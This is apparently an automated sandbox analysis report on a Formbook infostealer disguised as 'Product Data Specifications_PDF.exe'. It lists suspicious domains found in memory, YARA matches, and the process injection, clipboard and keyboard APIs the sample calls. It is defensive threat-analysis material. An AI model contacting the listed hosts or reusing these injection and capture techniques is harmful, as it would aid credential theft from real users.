Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/js/min.js?v2.3
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/10667/netsol-logos-2020-165-50.jpg
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28903/search.png)
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/28905/arrrow.png)
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/29590/bg1.png)
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://i3.cdn-image.com/__media__/pics/468/netsol-favicon-2020.jpg
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.Kevin-torkelson.info
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.kevin-torkelson.info/All_Inclusive_Vacation_Packages.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2F
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.kevin-torkelson.info/Anti_Wrinkle_Creams.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.kevin-torkelson.info/High_Speed_Internet.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaa
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.kevin-torkelson.info/Parental_Control.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZ
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.kevin-torkelson.info/__media__/design/underconstructionnotice.php?d=kevin-torkelson.info
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.kevin-torkelson.info/__media__/js/trademark.php?d=kevin-torkelson.info&type=ns
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, cmdl32.exe, 0000000C.00000002.3161285400.0000000007E10000.00000004.00000800.00020000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: http://www.kevin-torkelson.info/fashion_trends.cfm?fp=6j6oLwulZ3k544A1Hn3uTqUsRR%2FSpdhuuZoiiaaThZHr
Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.mandemj.top
Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3155322481.00000000007C7000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.mandemj.top/to69/
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://cdn.consentmanager.net
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: cmdl32.exe, 0000000C.00000002.3159746980.0000000005FAE000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://delivery.consentmanager.net
Source: EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.000000000335E000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://dts.gnpge.com
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: cmdl32.exe, 0000000C.00000002.3159746980.00000000057D4000.00000004.10000000.00040000.00000000.sdmp, EyHLOQmzGKBL.exe, 0000000D.00000002.3159223222.0000000002B84000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000011.00000002.2081521933.0000000020F04000.00000004.80000000.00040000.00000000.sdmp String found in binary or memory: https://jino.ru
Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003192000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033.
Source: cmdl32.exe, 0000000C.00000002.3155201371.00000000031B4000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
Source: cmdl32.exe, 0000000C.00000002.3155201371.0000000003192000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
Source: cmdl32.exe, 0000000C.00000003.1967966189.000000000809C000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
Source: cmdl32.exe, 0000000C.00000002.3161379449.00000000080BA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_0045A10F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0045A10F OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard, 6_2_0045A10F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0046DC80 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard, 6_2_0046DC80
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044C37A GetKeyboardState,SetKeyboardState,PostMessageW,PostMessageW,SendInput, 6_2_0044C37A
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0047C81C SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW, 6_2_0047C81C

E-Banking Fraud

barindex
Source: Yara match File source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

barindex
Source: 9.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 9.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3153614181.00000000030E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3158487172.00000000033F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1764340850.0000000003520000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1764028622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3150227447.0000000002B90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000D.00000002.3155322481.0000000000740000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000009.00000002.1764711374.0000000003C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3158420814.0000000003120000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: initial sample Static PE information: Filename: Product Data Specifications_PDF.exe
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0042C893 NtClose, 9_2_0042C893
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672B60 NtClose,LdrInitializeThunk, 9_2_03672B60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672DF0 NtQuerySystemInformation,LdrInitializeThunk, 9_2_03672DF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036735C0 NtCreateMutant,LdrInitializeThunk, 9_2_036735C0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03674340 NtSetContextThread, 9_2_03674340
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03674650 NtSuspendThread, 9_2_03674650
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672BE0 NtQueryValueKey, 9_2_03672BE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672BF0 NtAllocateVirtualMemory, 9_2_03672BF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672BA0 NtEnumerateValueKey, 9_2_03672BA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672B80 NtQueryInformationFile, 9_2_03672B80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672AF0 NtWriteFile, 9_2_03672AF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672AD0 NtReadFile, 9_2_03672AD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672AB0 NtWaitForSingleObject, 9_2_03672AB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672F60 NtCreateProcessEx, 9_2_03672F60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672F30 NtCreateSection, 9_2_03672F30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672FE0 NtCreateFile, 9_2_03672FE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672FA0 NtQuerySection, 9_2_03672FA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672FB0 NtResumeThread, 9_2_03672FB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672F90 NtProtectVirtualMemory, 9_2_03672F90
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672E30 NtWriteVirtualMemory, 9_2_03672E30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672EE0 NtQueueApcThread, 9_2_03672EE0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672EA0 NtAdjustPrivilegesToken, 9_2_03672EA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672E80 NtReadVirtualMemory, 9_2_03672E80
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672D30 NtUnmapViewOfSection, 9_2_03672D30
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672D00 NtSetInformationFile, 9_2_03672D00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672D10 NtMapViewOfSection, 9_2_03672D10
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672DD0 NtDelayExecution, 9_2_03672DD0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672DB0 NtEnumerateKey, 9_2_03672DB0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672C60 NtCreateKey, 9_2_03672C60
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672C70 NtFreeVirtualMemory, 9_2_03672C70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672C00 NtQueryInformationProcess, 9_2_03672C00
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672CF0 NtOpenProcess, 9_2_03672CF0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672CC0 NtQueryVirtualMemory, 9_2_03672CC0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03672CA0 NtQueryInformationToken, 9_2_03672CA0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03673010 NtOpenDirectoryObject, 9_2_03673010
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03673090 NtSetValueKey, 9_2_03673090
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_036739B0 NtGetContextThread, 9_2_036739B0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03673D70 NtOpenThread, 9_2_03673D70
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_03673D10 NtOpenProcessToken, 9_2_03673D10
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E34650 NtSuspendThread,LdrInitializeThunk, 12_2_04E34650
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E34340 NtSetContextThread,LdrInitializeThunk, 12_2_04E34340
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32CA0 NtQueryInformationToken,LdrInitializeThunk, 12_2_04E32CA0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32C60 NtCreateKey,LdrInitializeThunk, 12_2_04E32C60
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32C70 NtFreeVirtualMemory,LdrInitializeThunk, 12_2_04E32C70
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32DF0 NtQuerySystemInformation,LdrInitializeThunk, 12_2_04E32DF0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32DD0 NtDelayExecution,LdrInitializeThunk, 12_2_04E32DD0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32D30 NtUnmapViewOfSection,LdrInitializeThunk, 12_2_04E32D30
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32D10 NtMapViewOfSection,LdrInitializeThunk, 12_2_04E32D10
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32EE0 NtQueueApcThread,LdrInitializeThunk, 12_2_04E32EE0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32E80 NtReadVirtualMemory,LdrInitializeThunk, 12_2_04E32E80
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32FE0 NtCreateFile,LdrInitializeThunk, 12_2_04E32FE0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32FB0 NtResumeThread,LdrInitializeThunk, 12_2_04E32FB0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32F30 NtCreateSection,LdrInitializeThunk, 12_2_04E32F30
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32AF0 NtWriteFile,LdrInitializeThunk, 12_2_04E32AF0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32AD0 NtReadFile,LdrInitializeThunk, 12_2_04E32AD0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32BE0 NtQueryValueKey,LdrInitializeThunk, 12_2_04E32BE0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32BF0 NtAllocateVirtualMemory,LdrInitializeThunk, 12_2_04E32BF0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32BA0 NtEnumerateValueKey,LdrInitializeThunk, 12_2_04E32BA0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32B60 NtClose,LdrInitializeThunk, 12_2_04E32B60
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E335C0 NtCreateMutant,LdrInitializeThunk, 12_2_04E335C0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E339B0 NtGetContextThread,LdrInitializeThunk, 12_2_04E339B0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32CF0 NtOpenProcess, 12_2_04E32CF0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32CC0 NtQueryVirtualMemory, 12_2_04E32CC0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32C00 NtQueryInformationProcess, 12_2_04E32C00
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32DB0 NtEnumerateKey, 12_2_04E32DB0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32D00 NtSetInformationFile, 12_2_04E32D00
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32EA0 NtAdjustPrivilegesToken, 12_2_04E32EA0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32E30 NtWriteVirtualMemory, 12_2_04E32E30
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32FA0 NtQuerySection, 12_2_04E32FA0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32F90 NtProtectVirtualMemory, 12_2_04E32F90
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32F60 NtCreateProcessEx, 12_2_04E32F60
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32AB0 NtWaitForSingleObject, 12_2_04E32AB0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E32B80 NtQueryInformationFile, 12_2_04E32B80
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E33090 NtSetValueKey, 12_2_04E33090
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E33010 NtOpenDirectoryObject, 12_2_04E33010
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E33D70 NtOpenThread, 12_2_04E33D70
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_04E33D10 NtOpenProcessToken, 12_2_04E33D10
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BB96E0 NtDeleteFile, 12_2_02BB96E0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BB9790 NtClose, 12_2_02BB9790
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BB9480 NtCreateFile, 12_2_02BB9480
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BB95F0 NtReadFile, 12_2_02BB95F0
Source: C:\Windows\SysWOW64\cmdl32.exe Code function: 12_2_02BB98F0 NtAllocateVirtualMemory, 12_2_02BB98F0
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00431BE8: GetFullPathNameW,__swprintf,_wcslen,CreateDirectoryW,CreateFileW,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle, 6_2_00431BE8
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00446313 DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock, 6_2_00446313
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004333BE GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState, 6_2_004333BE
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004096A0 6_2_004096A0
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0042200C 6_2_0042200C
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0041A217 6_2_0041A217
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00412216 6_2_00412216
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0042435D 6_2_0042435D
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004033C0 6_2_004033C0
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044F430 6_2_0044F430
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004125E8 6_2_004125E8
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044663B 6_2_0044663B
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00413801 6_2_00413801
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0042096F 6_2_0042096F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004129D0 6_2_004129D0
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_004119E3 6_2_004119E3
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0041C9AE 6_2_0041C9AE
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0047EA6F 6_2_0047EA6F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0040FA10 6_2_0040FA10
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044EB5F 6_2_0044EB5F
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00423C81 6_2_00423C81
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00411E78 6_2_00411E78
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00442E0C 6_2_00442E0C
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00420EC0 6_2_00420EC0
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_0044CF17 6_2_0044CF17
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_00444FD2 6_2_00444FD2
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_040026C8 6_2_040026C8
Source: C:\Users\user\Desktop\Product Data Specifications_PDF.exe Code function: 6_2_04005ED0 6_2_04005ED0
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00418803 9_2_00418803
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_00410043 9_2_00410043
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_0041003A 9_2_0041003A
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004028EA 9_2_004028EA
Source: C:\Windows\SysWOW64\svchost.exe Code function: 9_2_004010F0 9_2_004010F0
